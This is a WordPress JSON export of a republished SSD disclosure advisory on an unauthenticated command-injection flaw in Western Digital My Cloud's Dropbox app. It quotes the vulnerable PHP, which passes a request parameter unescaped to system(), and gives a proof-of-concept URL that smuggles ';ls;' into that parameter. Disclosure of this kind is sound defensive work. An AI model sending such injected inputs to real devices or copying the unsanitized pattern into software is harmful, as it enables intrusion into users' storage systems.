{"id":9009,"date":"2017-08-30T14:19:06","date_gmt":"2017-08-30T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/30\/news-2782\/"},"modified":"2017-08-30T14:19:06","modified_gmt":"2017-08-30T22:19:06","slug":"news-2782","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/30\/news-2782\/","title":{"rendered":"SSD Advisory \u2013 Remote Command Execution in Western Digital with Dropbox App"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Wed, 30 Aug 2017 02:39:13 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\" id=\"a-href-3397\">ssd@beyondsecurity.com<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability summary<\/strong><br \/> The following advisory describes an unauthenticated Remote Command Execution vulnerability in My Cloud products that have the Dropbox App installed.<\/p>\n<p>The My Passport, My Book, and My Cloud (Single-Bay) drives allow users to back up their data to an existing Dropbox account using WD SmartWare Pro or WD Backup. 
The My Cloud Dropbox App (available on the multi-bay My Cloud drives) allows a user to sign in to their Dropbox account and synchronize the data stored between the drive and Dropbox storage.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Western Digital was informed of the vulnerability, and released Dropbox v2.00 to address it.<\/p>\n<p><span id=\"more-3397\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><\/p>\n<p>User-controlled input is not sufficiently sanitized before being passed to the <em>system()<\/em> function. The attacker-controlled value <em>$_REQUEST['account']<\/em> in <em>dropbox.php<\/em> can be exploited to gain remote command execution.<\/p>\n
<pre>&lt;?php\n$date = new DateTime();\n$r    = $date-&gt;getTimestamp();\n\n$cmd        = $_REQUEST['cmd'];\n$DropboxAPI = new DropboxAPI;\n\nswitch ($cmd) {\n    case \"delBlacklist\":\n        $DropboxAPI-&gt;delBlacklist();\n        break;\n    case \"getBlacklist\":\n        $DropboxAPI-&gt;getBlacklist();\n        break;\n    case \"setBlacklist\":\n        $DropboxAPI-&gt;setBlacklist();\n        break;\n    case \"getTree\":\n        $DropboxAPI-&gt;getTree();\n        break;\n}\n&#8230;\n&#8230;\n&#8230;\n&#8230;\nclass DropboxAPI\n{\n    public function getBlacklist()\n    {\n        \/\/ Taken straight from the request; no validation or escaping\n        $account = $_REQUEST['account'];\n        $xmlPath = \"\/tmp\/dBlack_$account.xml\";\n\n        @unlink($xmlPath);\n\n        \/\/ $account is interpolated unescaped into the shell command line\n        $cmd = \"dropnasctl -j $account --black_list_get -x $xmlPath &gt;\/dev\/null\";\n        system($cmd);\n\n        if (file_exists($xmlPath)) {\n            print file_get_contents($xmlPath);\n        } else {\n            print \"&lt;config&gt;&lt;list&gt;&lt;\/list&gt;&lt;\/config&gt;\";\n        }\n    }\n}<\/pre>\n
<p><strong>Proof of Concept<\/strong><\/p>\n<p>The following PoC will run the '<em>ls<\/em>' command on the victim's machine:<\/p>\n<pre>http:\/\/IP\/Dropbox\/php\/dropbox.php?cmd=getBlacklist&amp;account=;ls;<\/pre>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3397\" target=\"bwo\">https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Wed, 30 Aug 2017 02:39:13 +0000<\/strong><\/p>\n<p>Vulnerability summary The following advisory describes an unauthenticated Remote Command Execution vulnerability in My Cloud products that have the Dropbox App installed. The My Passport, My Book, and My Cloud (Single-Bay) drives allow users to back up their data to an existing Dropbox account using WD SmartWare Pro or WD Backup. The My Cloud Dropbox App (available &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3397\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Remote Command Execution in Western Digital with Dropbox App<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757,12136],"class_list":["post-9009","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9009","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9009"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9009\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9009"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9009"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}